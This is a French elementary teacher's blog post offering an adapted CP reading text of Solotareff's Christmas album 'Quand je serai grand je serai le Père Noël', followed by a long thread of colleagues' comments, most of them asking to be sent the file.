• Quand je serai grand je serai le Père Noël

     

     

    Quand je serai grand je serai le Père Noël

     

    Voici un album coup de coeur que j'étudierai avec mes CP.

    Il s'agit d'une très belle histoire permettant de comprendre qui est le Père Noël. Grégoire Solotareff nous fait voyager avec ce magnifique album.

    J'ai décidé de travailler autour de cet album, questions de compréhension, reformulations, anticipation...

    Puis évidemment LECTURE. Le texte de l'album étant dense et compliqué, jai tenté de faire un tapuscrit adapté au niveau des élèves à ce moment de l'année. Comme pour Une soupe 100% sorcière, certains mots incontournables pour l'histoire sont difficiles. c'est pour cela qu'ils sont soulignés, afin que les parents puissent les aider quand ils lisent.

    Je travaillerai aussi sur le type d'écrit de la lettre puisque à deux reprises dans l'album, Noël reçoit une lettre.

    J'espère que cela vous sera utile, c'est le but.

    J'essaierai de mettre en ligne ce que je concevrai les jours qui arrivent.

    La tapuscrit adapté est malheureusement trop lourd, le blog ne peut l'héberger... . Il dépasse les 10Mo autorisés... Je ne peux pas vous le laisser à disposition. Cependant, n'hésitez pas à me le demander je me ferai un plaisir de vous l'envoyer.

    Bonne soirée. :)


  • Commentaires

    1
    Vallyedp
    Lundi 25 Novembre 2013 à 09:53

    Bonjour,

    Je suis intéressée par votre travail sur "quand je serai grand je serai le Père Noël", pourriez vous me le faire parvenir? Je vous remercie.

    Cordialement

    Vallyedp

      • gisele
        Lundi 3 Décembre 2018 à 21:24

        bonjour,

        je serai aussi intéressée pour le tapuscrit'quand je serai grand je serai père noël"

        merci d'avance

        Cordialement

        Gisèle

      • fiona
        Vendredi 13 Novembre 2020 à 09:46

        Bonjour vous pourriez m'envoyer le tapuscrit svp? Fiona.lasserre@gmail.com

        La propriétaire ne répond plus :( merci beaucoup!

    2
    Lundi 25 Novembre 2013 à 18:10

    Je vous l'envoie de suite.

    Merci :)

      • Soizic
        Lundi 5 Octobre 2015 à 20:10

        Bonjour,

        Je serai à mon tour intéressé par votre tapuscrit. Pourriez-vous me l'envoyer ? Merci !

      • Dimanche 10 Décembre 2017 à 16:35

        Bonjour, pouvez-vous m'envoyer le tapuscrit de Quand je serai grand je serai Père Noël?

         

        Merci beaucoup par avance !

         

        Caterina

      • Noëlla
        Mercredi 28 Novembre 2018 à 12:36

        Bonjour, pourriez vous m'envoyer le tapuscrit "Quand je serai grand je serai Père Noël" avec le travail que vous avez réalisé ?.

        Merci beaucoup

        Bonne journée.

    3
    Léontine22
    Lundi 25 Novembre 2013 à 20:44

    Je me penche sur cet album avec mes MS GS et je serai bien intéressée par ce que vous avez construit. Je m'engage à vous renvoyer mes recherches en retour évidemment : ) merci !

      • fiona
        Vendredi 13 Novembre 2020 à 09:48

        Bonjour vous pourriez m'envoyer le tapuscrit svp? Fiona.lasserre@gmail.com

        La propriétaire ne répond plus :( merci beaucoup!

    4
    mariechat
    Lundi 25 Novembre 2013 à 20:54

    j'aimerai bien moi aussi découvrir cet abum!!! d'avance merci !!!

      • Esther
        Jeudi 8 Novembre 2018 à 00:50

        Bonjour, je suis intéresée par vtre tapuscrit.

        Pourriez-vous me l'envoyer.

        Merci

    5
    Lundi 25 Novembre 2013 à 21:20

    Je veux bien vous l'envoyer les filles, mais il me faut votre adresse mail. Vous pouvez me l'envoyer en privé dans la rubrique contactez moi en haut à gauche. 

      • fiona
        Vendredi 13 Novembre 2020 à 09:49

        Bonjour vous pourriez m'envoyer le tapuscrit svp? Fiona.lasserre@gmail.com

         merci beaucoup!

    6
    au clair de la lune
    Mercredi 27 Novembre 2013 à 19:48

    Bonjour, je suis intéressée par votre tapuscrit et le travail que vous avez réalisé autour de cet album.

    Pourriez-vous me l'envoyer?

     

    Merci beaucoup

    7
    atthena59
    Samedi 30 Novembre 2013 à 11:45

    Bonjour, je serai aussi intéressée par votre travail. Je souhaiterai changer un peu mes lectures de Noël.Merci pour votre partage.

    8
    Iza2Tudy
    Dimanche 1er Décembre 2013 à 11:25

    Bonjour


    Ayant moi même des GS -CP  je serai intéressée par votre pravail et je vous ferai parvenir ce que j'aurai pu construire si cela vous intéresse D'avance merci


     

    9
    stephanie62
    Dimanche 1er Décembre 2013 à 18:37

    Bonsoir, je serai intéressée par le travail que vous avez fait sur "Quand je serai grand je serai Père Noel".

    Pourriez-vous me le transmettre ainsi que le tapuscrit ? Merci.

    10
    lockemaidele
    Dimanche 1er Décembre 2013 à 19:09

    Bonsoir, je serai intéressée par le travail que vous avez fait sur "Quand je serai grand je serai Père Noel".


    Pourriez-vous me le transmettre ainsi que le tapuscrit ? Merci.


     

    11
    kachlo
    Dimanche 1er Décembre 2013 à 20:34

    Bonjour ,

    Je serai interessée  par votre travail sur l' album " Quand je serai grand .... " ainsi que le tapuscrit ?

    Pourriez vous me le faire parvenir ? D'avance , merci !

     

    12
    lilali lalou
    Lundi 2 Décembre 2013 à 18:49

    Bonsoir, le tapuscrit de Quand je serai grand je serai le père noël m'intéresse, merci beaucoup !!! 

    13
    Lundi 2 Décembre 2013 à 19:27

    Les filles, sans votre adresse mail, je ne peux pas vous envoyer le tapuscrit. 

    Envoyez moi un mail ;) Merci!!

      • sandy
        Mardi 29 Octobre 2019 à 14:31

        Bonjour, j'ai moi aussi craqué pour "Quand je serai grand je serai père Noel", pourrais je avoir le tapuscrit et l'exploitation svp? Un énorme merciiiii

    14
    lilali lalou
    Lundi 2 Décembre 2013 à 19:34

    c'est fait :) 

    15
    lilali lalou
    Lundi 2 Décembre 2013 à 20:16

    as tu reçu mon adresse mail? 

    16
    sophie 38
    Lundi 2 Décembre 2013 à 22:03

    bonsoir,

    je suis intéressée  par ce travail.

    Pouvez vous me le faire parvenir s'il vous plait.

    Merci d'avance!

    17
    gaët53
    Mardi 3 Décembre 2013 à 17:43

    Bonjour, je suis intéressé par le tapuscrit et le travail sur l'album "quand je serai grand je serai le Père Noël".

    Merci pour ton joli blog. 

    18
    Mardi 3 Décembre 2013 à 18:08

    Merci à youtes pour l'intérêt que vous portez à mon blog.

    lilali lalou, oui, as tu reçu le document?

    19
    lilali lalou
    Mardi 3 Décembre 2013 à 18:11

    non je n'ai rien reçu ... le travail m'intéresse aussi stp , merci :) 

      • fiona
        Vendredi 13 Novembre 2020 à 09:49

        Bonjour vous pourriez m'envoyer le tapuscrit svp? Fiona.lasserre@gmail.com

        La propriétaire ne répond plus :( merci beaucoup!

    20
    Mardi 3 Décembre 2013 à 18:19

    Lilali lalou, renvoie moi ton adresse, c'est un oubli involontaire... j'ai beaucoup de personnes qui m'envoient des mails je ne sais plus à qui j'ai envoyé et à qui je n'ai pas envoyé...

    Si jamais j'ai oublié quelqu'un n'hésitez pas à me redemander... ;)

    21
    sophie 38
    Jeudi 5 Décembre 2013 à 14:56

    Bonjour,

    Je n'ai pas reçu le dossier...

    Pouvez vous me l'envoyer s'il vous plait.

    Merci d'avance ;-)

    22
    Vendredi 6 Décembre 2013 à 21:10

    Bonsoir Sophie 38, je n'ai pas reçu ton adresse mail... c'est pour ça... désolée...

    23
    Sonia.E
    Samedi 7 Décembre 2013 à 10:34

    Bonjour, 

    Serait-il possible d'avoir le tapuscrit? 

    Merci beaucoup! 

    Sonia

    24
    Audrey27
    Dimanche 8 Décembre 2013 à 16:06

    Bonjour, je suis intéressée par votre tapuscrit et votre travail autour de cet album.

    Pourriez-vous me l'envoyer?

    25
    Dimanche 8 Décembre 2013 à 16:30

    Oui... mais svp envoyez moi vos adresses mail... je ne peux pas les deviner... 

    Merci..

    26
    B
    Dimanche 8 Décembre 2013 à 17:56

    Bonjour, je suis intéressée par votre tapuscrit.

    Merci pour tout.

    27
    gil974
    Dimanche 8 Décembre 2013 à 19:21

    bonsoir, 

    j'aimerai bien le tapuscrit pour ma classe. merci de me l'envoyer.

    28
    LP
    Lundi 9 Décembre 2013 à 03:51

    Bonsoir,


    Serait-il possible de recevoir le tapuscrit?


    Merci d'avance!

    29
    LN44
    Lundi 9 Décembre 2013 à 15:37

    bonjour,

    je suis moi aussi intéressée par le tapuscrit de cet album

    merci beaucoup d'avance et bravo pour ce blog très riche qui nous aide beaucoup...

    30
    Majulotte62
    Jeudi 12 Décembre 2013 à 21:59

    Bonsoir Ketchou,

    Cet album me plait beaucoup, c'est super sympa que tu partages ton travail !

    Pourrais-tu m'envoyer le tapuscrit et son exploitation ?

    D'avance merci

    31
    Jeudi 12 Décembre 2013 à 22:10

    Chers cyber-collègues... j'ai besoin de vos adresses mail... je ne peux pas vous envoyer sans connaître vos mails... :(

    32
    LN44
    Vendredi 13 Décembre 2013 à 07:46

    d'accord mais comment je fais pour que mon adresse n'apparaisse pas sur ton blog ?

    bonne dernière semaine

    33
    sophie 38
    Samedi 14 Décembre 2013 à 14:54

    bonjour!

    voici mon adresse mail. (c'était pour le travail sur "quand je serai grand....")

     

    merci d'avance !!!

    sophie

    34
    Samedi 14 Décembre 2013 à 17:50

     Pour que l'adresse n'apparaîsse pas sur le blog il suffit de m'envoyer un mail via "contactez moi" en haut à gauche du blog. ;)

    35
    CES
    Samedi 28 Décembre 2013 à 12:18

    J'aimerai aussi découvrir l'album " quand je serai grand je serai Père Noël" Par avance merci.


    Cordialement

    36
    Sabrina
    Mercredi 11 Juin 2014 à 23:27

    Bonjour!


    J'enseignerai le français langue seconde l'année prochaine à des élèves de 8 ans (deuxième année au Québec-CE1). J'aimerais beaucoup recevoir votre tapuscrit de l'album Quand je serai grand, je serai Père Noel.


    Merci!

    37
    regded
    Lundi 4 Août 2014 à 16:53
    Bonjour,
    Tout d'abord merci pour ce travail que vous partagez, pourriez-vous me transmettre le tapuscrit svp.
    Par avance, merci.
    38
    sof
    Jeudi 9 Octobre 2014 à 15:40

    Bonjour,


    Noël arrive à grands pas....et je vais traviller avec mes Cp l'album quand je serai grand je serai le père noel....pourriez vous me transmettre le tapuscrit SVP?


    Merci de votre aide.


    Cordialement

    39
    vandenbilcke lucile
    Mardi 21 Octobre 2014 à 21:35

    B onsoir,

    Je trouve que votre blog est une mine d'or et  je vous admire pour votre travail et surtout pour le temps que vous passez à tout partager ! 

    Je suis cette année dans un IME et aimerais bien travailler sur l'album de Solotareff que j'adore aussi, mais mes élèves ont vraiment un faible niveau de compréhension. Pourriez vous me faire parvenir le tapuscrit par mail svp?

    En vous remerciant par avance.

    Bonne soirée à vous

    40
    sabrina
    Mardi 21 Octobre 2014 à 23:57

    Bonjour,

     

    Jaimerais bien recevoir le tapuscrit svp. Je suis enseignante au Quebec, mes eleves aimeraient beaucoup.

     

    Merci et bonne journee!

     

    Sabrina

    41
    Dimanche 9 Novembre 2014 à 11:27

    Bonjour,

    Pourriez-vous m'envoyer le tapuscrit de cet album s'il vous plait? D'avance, merci!

     

    42
    ML
    Dimanche 30 Novembre 2014 à 11:00

    noël approche et je suis à la recherche du tapuscrit de "quand je serai grand, je serai père noël. Vous est il possible de l''envoyer? Merci et BRAVO pour votre site

    43
    bea
    Mercredi 3 Décembre 2014 à 17:35

    Bonjour, pouvez-vous m'envoyer le tapuscrit de l'album ? merci beaucoup.

    44
    Elsa
    Vendredi 5 Décembre 2014 à 08:18

    Bonjour, Je serai intéressée de voir l'exploitation de cet album avec vos CP. J'ai un CP cette année pour la première fois (CP/CM1 pour être plue précise). J'ai moi même eu un coup de coeur pour cet album.


    Merci d'avance

    45
    cholinette
    Samedi 6 Décembre 2014 à 08:15

    Je suis intéressée par votre travail autour de cet album . Pourriez vous me me le faire parvenir .

    D'avance merci !

     

    46
    leconte
    Dimanche 7 Décembre 2014 à 16:04

    Bonjour,


     


    j'ai une classe de cp/ ce1 et j'avais l'intention de travailler sur cet album. Serait-il possible de m'envoyer votre travail afin que je m'appuie dessus!


    Cordialement

    47
    nane
    Mercredi 10 Décembre 2014 à 00:21

    Bonsoir, 


    Je serai intéressée par votre travail sur cet album car j'ai déjà préparé pour mes ce1 mais ces documents me permettraient de faire bosser mes cp dessus aussi.


    merci 

    48
    Aude
    Mercredi 10 Décembre 2014 à 16:20

    Bonjour, je serai intéressée par le texte de "Quand je serai grand je serai père noel", est-ce possible de l'avoir?

    Merci beaucoup.

    49
    Jojo
    Samedi 13 Décembre 2014 à 19:27

    Bonjour, je serai également très intéressée par le tapuscrit. Puis-je le recevoir svp?


    Bien cordialement.

    50
    Lalieplume
    Lundi 15 Décembre 2014 à 17:44

    bonsoir,

    Je serai intéressée par votre "tapuscrit" sur "Quand je serai grand..." car j'aimerais le lire en classe et le travailler un peu avant les vacances de fin d'année.

    Pourriez-vous me le faire parvenir par mail SVP?

    Merci par avance et bonnes fêtes de fin d'année.

    Lalie

    51
    cyrille
    Mardi 16 Décembre 2014 à 14:10

    bonjour pourrai-je avoir le tapuscrit de quand je serai grand je serai le père noël merci beaucoup d'avance

    52
    Lundi 6 Juillet 2015 à 16:35

    Bonjour, 

    Pouvez-vous s'il vous plait m'envoyer le tapuscrit adapté de cet album? frederique971@gmail.com

    Je vous en remercie d'avance!

    Frédérique

    53
    béa du 26
    Samedi 12 Septembre 2015 à 17:50

    Bonjour,

    Pouvez-vous m'envoyer votre travail sur cet album : tapuscrit + exercices ?

    Merci beaucoup

    Béa du 26

    54
    cecile
    Dimanche 18 Octobre 2015 à 18:11

    J'ai une classe de CP/CE1 et je vais travaillé sur cet album avec mes CE1. Je suis donc très intéressée par ton travail. Serait-il possible de me l'envoyer?

    Bonnes vacances.

    Cécile

    55
    cecile
    Dimanche 18 Octobre 2015 à 18:24

    Désolée, pour la coquille, j'étais perturbée!!! OUPS! Je vais travaillER mes règles d'orthographeyes

     

    56
    Pink Vador
    Lundi 19 Octobre 2015 à 10:15

    Bonjour,

     

    Je suis moi aussi très intéressée par votre tapuscrit de Quand je serai grand, je serai le Père-Noël. Pouvez-vous me l'envoyer s'il vous plaît ? Merci d'avance.

    57
    Elo
    Mardi 20 Octobre 2015 à 17:51
    Bonjour ! Je suis moi aussi intéressée par le tapuscrit de quand je serai grand je serai père noel .
    Merci pour votre travail .
    58
    valou
    Vendredi 23 Octobre 2015 à 12:29

    Bonjour,

    Je souhaiterai exploiter l'histoire de" quand je serai grand, je serai le père noël" avec mes cp. pourriez-vous me l'envoyer par mail?

    Un grand merci à votre partage sur ce site. Valou

     

    59
    Ameline
    Samedi 24 Octobre 2015 à 12:15

    Bonjour ! 

    Je suis PES et ton travail autour de l'album m'intéresse beaucoup ! J'avais prévu de travailler dessus avant noël.

    Pouvez vous me l'envoyer ? Merci davance ! C'est super de voir tous ces partages, pour moi qui débute, c'st très enrichissant ! Quand j'aurai plus d'expérience j'espère moi aussi partager mon travail. 

    Ameline

    60
    Sylvinou
    Lundi 26 Octobre 2015 à 14:44

    bonjour,

    Bravo pour votre travail !! je suis intéressée par le tapuscrit pouvez-vous me l'envoyer?

     

    61
    Magalisou
    Mercredi 28 Octobre 2015 à 23:29

    Bonsoir,

    Je suis intéressée par le travail que vous avez fait sur "Quand je serai grand je serai Père Noël".

    Pourriez-vous me le transmettre ainsi que le tapuscrit ?

    Je vous remercie d'avance, merci également pour votre travail et votre partage.

    Magalisou

     

    62
    Elise
    Dimanche 1er Novembre 2015 à 15:57

    Bonjour,

     

    Je suis très intéressée par le Tapuscrit de "Quand je serai grand je serai Père Noël". Pourriez vous me l'envoyer s'il vous plait ?

    Merci pour votre travail. 

    Elise

    63
    Marieclo
    Jeudi 5 Novembre 2015 à 18:54

    Bonsoir,

    A l'approche de Noël, j'aimerais travailler avec mes élèves sur l'album "Quand je serai grand, je serai Père-Noël". Votre tapuscrit m'intéresserait bien. Merci d'avance. Marieclo

      • Marieclo
        Mercredi 18 Novembre 2015 à 20:01

        Bonsoir,

        Apparemment, vous m'avez répondu mais je ne vois pas votre réponse concernant le tapuscrit de "Quand je serai grand, je serai Père-Noël.

        Merci d'avance pour votre réponse.
        Marie-Clo

         

         

    64
    Hornus
    Jeudi 12 Novembre 2015 à 17:03

    Bonjour,

    Pourriez-vous m'envoyer le tapuscrit de "Quand je serai grand je serai Père Noël" ?

    Merci d'avance pour votre réponse et/ou votre envoi.

    Cordialement,

    Marie

    65
    hermine
    Mercredi 18 Novembre 2015 à 18:50

    Bonsoir, votre tapuscrit su "Quand je serai grand je serai le père noël" m'intéresse...serait-il possible de l'avoir?

    Merci d'avance !

    66
    DElph821
    Dimanche 22 Novembre 2015 à 10:24

    Bonjour,

    J'ai une classe de CP/CE1 et je vais travailler avec eux sur l'album de Solotareff. Je suis donc très intéréssée par votre tapuscrit.

    Pourriez vous me l'envoyer? Merci d'avance

    Bonne journée et Merci pour votre blog!

     

    67
    veve
    Mardi 24 Novembre 2015 à 17:43

    Bonsoir, je suis intéréssée par votre tapuscrit. Si vous pouvez me l'envoyer ce serait super sympa ! Mes loustics de CP seront tres heureux . je lis ce livre depuis longtemps mais je ne l'avais jamais exploiter ! Merci beaucoup        bonne journée

    68
    leelou
    Mercredi 25 Novembre 2015 à 14:32

    Bonjour, noël approchant, je serai très intéressée par votre travail et votre tapuscrit de l'album "Quand je serai grand, je serai le Père Noël". Pourriez-vous me le faire parvenir ? Merci par avance pour votre travail et votre partage. Bonne journée.

    69
    karo
    Mercredi 25 Novembre 2015 à 18:34

    Bonjour 

    Pourrais tu s'il te plait m'envoyer le tapuscrit?

    Merci beaucoup

    70
    Lisa
    Jeudi 26 Novembre 2015 à 14:03

    Bonjour,

     

    Je suis très intéressée par ton travail sur quand je serai grande je serai le père Noël. J'ai une classe unique PS/MS/GS/CP. Je voudrai travailler sur cet album avec l'ensemble de mes élèves. J'ai trouvé des activités pour mes mater mais pas encore pour le CP. Pourrais tu m'envoyer ton tapuscrit?

     

    Merci bcp

     

    Lisa

    71
    Laetitia
    Jeudi 26 Novembre 2015 à 19:11

    Bonsoir, je suis intéressée par votre exploitation de Solotareff ( quand je serai grand). Serait -il possible que vous me le fassiez parvenir?

    Merci beaucoup

    72
    Marieclo
    Vendredi 27 Novembre 2015 à 22:48

    Bonsoir, j'aimerais travailler sur l'album "Quand je serai grand, je serai le Père-Noël". Pourrais-tu me transmettre le tapuscrit ?

    Merci d'avance pour ta réponse et ton aide. Marie-Clo

    73
    Soise
    Samedi 28 Novembre 2015 à 19:20

    Bonjour, je suis également intéressée de connaître votre travail sur cet album car je compte l'utiliser avec ma classe de GS CP. Merci d'avance de votre partage

    74
    Lundi 30 Novembre 2015 à 00:16

    Bonjour je suis intéressé par votre travail, je compte faire cet album avec ma classe de CP, j'ai déjà le tapuscrit et je suis à la recherche d'activité autour de cet album. Merci d'avance.
    Benoit 

    75
    Claire
    Jeudi 3 Décembre 2015 à 10:08
    Claire

    Bonjour,

    Je travaille dans une école bilingue en Angleterre et je prépare un petit spectacle pour la fin de l'année. Je suis intéressée par le tapuscrit de "Quand je serai grand je serai le Père Noel". Est-il possible que vous me l'envoyiez?

    Merci d'avance et pour tout le travail que vous faites.

    Claire

    76
    Virginie
    Dimanche 6 Décembre 2015 à 16:49

    Bonjour,

    Je suis intéressée par votre travail sur l'album quand je serai grand je serai Père Noël.

     

    Vous pourriez me le faire parvenir?

    Merci d'avance et bravo pour tout ce partage .

     

    Virginie

    77
    champi
    Jeudi 10 Décembre 2015 à 22:39

    Pouvez-vous m'envoyer le tapuscrit s'il vous plait

    Merci pour votre travail

    78
    pasdut
    Samedi 12 Décembre 2015 à 09:44

    Je voudrais faire découvrir cette histoire à mes CPs la semaine prochaine. Pourriez-vous m'envoyer votre tapuscrit (et autres supports) ? Merci beaucoup. Pascale

    79
    AgnesG
    Mercredi 15 Juin 2016 à 14:20

    Bonjour, ma collègue et moi projetons d'exploiter cet album dans notre CP de l'année prochaine. Pourriez-vous nous faire parvenir ce dossier s'il vous plaît? nous en ferons ensuite une version personnelle avec des différenciations. Merci à vous et bonne fin d'année scolaire.

    80
    Celine
    Mercredi 28 Septembre 2016 à 20:09

    Merci pour votre blog qui est une mine, et qui m'aide beaucoup dans mon travail d'enseignante.

    Je serais egalement interessee par votre travail sur cet album de Solotareff.

    Merci par avance.

    81
    Dimanche 23 Octobre 2016 à 19:45

    Bonjour,

    Je suis intéressée par votre travail sur "quand je serai grand je serai le Père Noël", pourriez vous me le faire parvenir? Je vous remercie.

    Cordialement

    cathycp

    82
    Lanoune
    Vendredi 28 Octobre 2016 à 14:48

    Bonjour!

    J'aimerais connaître le travail que vous avez fait autour de cet album "Quand je serai grand je serai Père Noël" pour les CP. Pourriez-vous me l'envoyer ? Merci beaucoup ...

    83
    maîtresse Lydie
    Mardi 1er Novembre 2016 à 13:58

    Bonjour,

    Je souhaiterais travailler sur l'album "Quand je serai grand je serai le père Noël"avec mes Cp  et votre travail (tapuscrit et fiches de lecture) m'intéresse beaucoup.

    Pourriez-vous m'envoyer vos documents,

    Un GRAND MERCI

    Lydie

    84
    sidu
    Mercredi 2 Novembre 2016 à 13:57

    bonjour, pourriez vous m'envoyer le tapuscrit et les fiches de questions? je cherche un album à exploiter avec mes cp.je vous remercie

    Sylvie

    85
    alexe
    Samedi 12 Novembre 2016 à 08:53

    Ayant des Cp cette année, je souhaiterais votre travail sur l'album Quand je serai grand... Cela est-il toujours possible?

    Merci D'avance

    Alexe

    86
    Mary
    Samedi 19 Novembre 2016 à 08:39

    Bonjour,

    Je suis intéressée par votre travail sur "quand je serai grand je serai le Père Noël", pourriez vous me le faire parvenir? Je vous remercie.

    Cordialement

    Mary

    87
    Laura
    Mardi 22 Novembre 2016 à 08:41

    Bonjour, Pouvez-vous m'envoyer votre tapuscrit de "Quand je serai grand je serai le Père Noël" ? Merci beaucoup. Laura

    88
    Leroux Gwenaëlle
    Mercredi 23 Novembre 2016 à 16:54

    Bonjour,

    Je compte travailler avec mes élèves de CP sur l'album Quand je serai grand je serai le père Noël. Je travaille depuis peu sans manuel, je trouve ça génial! Mais en ce moment le temps est compté, comme pour beaucoup j'imagine! Je te demande donc si tu peu m'envoyer le tapuscrit de cet album? Par avance merci de ce que tu partages. A très vite donc,Gwenaëlle .

    89
    Célia
    Dimanche 27 Novembre 2016 à 13:27

    Bonjour,

    Je suis intéressée par votre travail sur l'album "Quand je serai grand je serai Père-Noël", notamment le tapuscrit adapté aux CP.
    Si vous pouvez m'envoyer ce document j'en serais ravie ! Merci encore pour votre travail et vos partages.

    Célia

     

    90
    Perrine
    Mardi 29 Novembre 2016 à 21:12

    Bonsoir, je souhaiterais travailler sur cet album avec mes CE2 ... Pouvez-vous m'envoyer svp le tapuscrit ? merci à l'avance pour vos partages :) 

    91
    Emeline
    Mercredi 30 Novembre 2016 à 16:03

    Bonjour,

    Je suis intéressée par votre tapuscrit. Si vous êtes toujours d'accord pour l'envoyer par mail je serai ravie !

    Merci d'avance,

    Emeline

    92
    Isabelle
    Jeudi 1er Décembre 2016 à 16:26

    Bonjour. Mon fils a un devoir à faire et je trouve ce texte nul part.Auriez vous la gentillesse de me l'envoyer par mail car impossible de le trouver en librairie non plus. Merci beaucoup. Cordialement 

    93
    Isabelle
    Jeudi 1er Décembre 2016 à 16:27

    Bonjour. Auriez vous la gentillesse de m.envoyer ce texte par mail car impossible de le trouver ni sur internet ni en librairie. Merci beaucoup. Cordialement 

    94
    Hélène
    Dimanche 4 Décembre 2016 à 08:56

    Bonjour, votre travail sur cet album de Solotareff m'a l'air très intéressant. Serait-il possible que vous me l'envoyiez?

    Merci !

    95
    tchalette
    Jeudi 8 Décembre 2016 à 21:15

    bonjour,  je suis maitresse de CP-CE1. Je serai interessée par votre tapuscrit de "quand je serai grand, je serai père noel".merci d'avance.Tchalette

    96
    cleanne
    Vendredi 9 Décembre 2016 à 00:32

    J'aimerais découvrir l'album " quand je serai grand je serai Père Noël".

    Déjà merci.

     

    Cordialement.

    Cleanne

    97
    Léa
    Mercredi 21 Décembre 2016 à 22:53

    bravo pour votre travail!! serait-il possible de le recevoir pour étudier l'exploitation pendant ces vacances de Noël avec mon fils qui est en cp? Merci beaucoup! au plaisir de vous lire! bonne continuation Lea

    98
    mylene
    Mercredi 26 Avril 2017 à 09:39

    Bonjour je serais aussi intéressée par le tapuscrit de quand je serai grand je serai père Noël.Pourrais-tu me l'envoyer

    Merci beaucoup.

    une collègue de cp ce1

    99
    Poa
    Dimanche 23 Juillet 2017 à 15:27
    Poa

    Bonjour, je suis intéressée par le tapuscrit de "Quand je serai grand je serai père Noël" que je compte adapter pour un spectacle de maternelle à Noël.

    Pourriez-vous me l'envoyer?

    Merci infiniment.

    100
    Poa
    Dimanche 23 Juillet 2017 à 15:46
    Poa

    Bonjour,

    le tapuscrit de "Quand je serai grand, je serai le Père Noël" m'intéresse. Je compte l'utiliser pour le spectacle de Noël en maternelle.

    Pourriez-vous me l'envoyer sur mon adresse?

    Merci infiniment pour ce partage.

    101
    Julia
    Samedi 5 Août 2017 à 14:38

    Bonjour, 

    Serait-il possible de m'envoyer le tapuscrit de "Quand je serai grand je serai le Père Noël" ? 
    J'aimerais voir si on peut l'adapter pour des Ce1 petit niveau avant de l'acheter. 
    Merci d'avance.

    102
    Delphine
    Mercredi 13 Septembre 2017 à 14:39

    Bonjour,

    Je suis intéressée par le tapuscrit "Quand je serai Père Noël..." cela vous dérangerait-il de me l'envoyer?

    Merci de parrtager votre travail car c'est une aide précieuse!

    103
    Bonnaud Aurélie
    Lundi 16 Octobre 2017 à 21:36

    Bonjour, 

    Ma collègue et moi-même ne sommes pas passionnées par l'album de Noël proposé dans la méthode de lecture que nous suivons ( un peu vieillotte). Nous aimons toutes les deux l'album de Solotareff et serions intéressées par votre travail . Merci pour votre proposition de partage. 

     

    104
    Michaël
    Lundi 23 Octobre 2017 à 18:03

    Bonjour,

    J'ai décidé d'exploiter "quand je serai grand je serai le Père Noël" juste avant les fêtes de fin d'année. Je suis donc très intéressé par le tapuscrit et le travail que vous avez produit sur cet album, pourriez vous me le faire parvenir?

    Je vous remercie et vous félicite pour le travail accompli, bravo.

    Michaël

    105
    Fred
    Mardi 24 Octobre 2017 à 20:30

    Bonsoir,

    un immense merci pour votre travail! J'aimerais exploiter "quand je serai grand je serai père Noël" avec mes CP. Pourriez vous me l'envoyer s'il vous plait? Merci

    106
    Coralie
    Jeudi 26 Octobre 2017 à 05:37
    Bonjour,
    Je souhaiterais exploiter cet album avec des moyens grands. Pourriez vous m envoyer le tapuscrit? Avez vous eu des retours de collègues de ce niveau sur le livre en question ?Débutante en maternelle, cela me serait bien utile.
    Merci d avance !
    107
    christele
    Vendredi 27 Octobre 2017 à 11:06

    Je souhaiterais travailler sur l'album "Quand je serai grand je serai père noel". Pourriez vous m'envoyer le tapuscrit ainsi que le travail sur cet album que vous avez réalisé?

    Je vous remercie et vous félicite pour votre travail!

    Christele

    108
    jessago
    Dimanche 29 Octobre 2017 à 10:54

    Bonjour, 

     

    Je suis très intéressée par le tapuscrit et votre travail autour de l'album. Pourriez-vous me l'envoyer svp?

     

    Je vous remercie par avance! 

     

    Bonnes vacances!

    109
    CPic
    Mardi 31 Octobre 2017 à 21:12

    Bonjour

    Je serais intéressée par le tapuscrit de l'album "Quand je serai grand je serai Père Noël". Vous serait-il possible de me l'envoyer. Merci infiniment.

    110
    lise
    Jeudi 2 Novembre 2017 à 11:34

    Bonjour,

    Je suis très intéressée par le tapuscrit "Quand je serai grand je serai Père Noël". Pouvez-vous me l'envoyer?

    Merci beaucoup

    111
    Aude
    Samedi 11 Novembre 2017 à 19:55

    bonjour, 

    fane de littérature de jeunesse, je suis intéressée par votre travail. Serait- ce possible de bénéficier de votre partage s'il vous plaît? Le travail de Grégoire Solotareff et de sa soeur Nadja m'émerveille et j'aimerai beaucoup pouvoir le partager avec mes élèves grâce à vous!

    En vous remerciant d'avance de votre attention et de votre partage, 

    cordialement, Aude

    112
    mario
    Vendredi 17 Novembre 2017 à 18:16

    je suis intéressée par votre travail sur l'album, pouvez-vous me le transmettre? ce serait génial, un tout grand mercihappy

    113
    mario
    Vendredi 17 Novembre 2017 à 18:17
    114
    Virgule
    Mercredi 22 Novembre 2017 à 22:53

    Bonjour, bravo pour votre travail d'adaptation de l'album Quand je serai grand je serai père Noël!

    C'est en effet nécessaire pour des CP à cette époque de l'année.  Cela m'intéresse pour ma classe de CP. Pourriez-vous m'envoyer le tapuscrit adapté?

    En vous remerciant et au plaisir de vous lire sur votre blog,

    Virgule

    115
    Lily 29
    Vendredi 24 Novembre 2017 à 22:14

    Bonjour,

    bravo et merci pour votre partage. Je suis en train de peaufiner mon projet sur le thème de Noël avec mes petits CP.

    Je souhaite travailler avec eux sur le superbe album "Quand je serai grand je serai le Père Noël" de Solotareff.

    Votre version tapuscrit serait d'une grande aide pour mes élèves. Vous serait-il possible de me l'envoyer par mail ?

    Je vous remercie et vous félicite encore pour la qualité de votre blog et de votre travail partagé.

    Lily 29

    116
    Odrée
    Dimanche 26 Novembre 2017 à 15:38

    Bonjour,

     

    Un album coup de coeur...alors moi aussi j'ai envie de le travailler en classe! Pourriez-vous m'envoyer le tapuscrit adapté au CP et votre travail autour de l'album?

    Merci beaucoup pour votre partage et merci par avance pour votre réponse!

     

    Odrée

    117
    jessica
    Dimanche 26 Novembre 2017 à 19:20

    bonsoir,

    tout d'abord merci pur ce travail!!!! Serait-il possible d'avoir le tapuscrit de "quand je serai grand je serai père noël"? Merci d'avance

    118
    cécile95
    Dimanche 26 Novembre 2017 à 21:28

    Bonsoir, je suis interessée par votre dossier sur l'album : Quand je serai grand, je serai le Père Noël.

    Pourriez-vous me l'envoyer par mail.

    Merci d'avance.

    119
    Aurélia
    Mardi 28 Novembre 2017 à 12:06

    Bonjour, je suis intéressée par le tapuscrit. D'avance merci.

    Aurélia

    120
    Soso85
    Jeudi 30 Novembre 2017 à 17:13

    Bonsoir,

    Tout d'abord, merci pour tout ce que vous partagez sur votre site!

    Je serais intéressée par le tapuscrit de "Quand je serai grand, je serai Père-Noël"

    Bonne fin de période

    Sophie

    121
    Benoit
    Samedi 2 Décembre 2017 à 16:48

    Bonjour, 

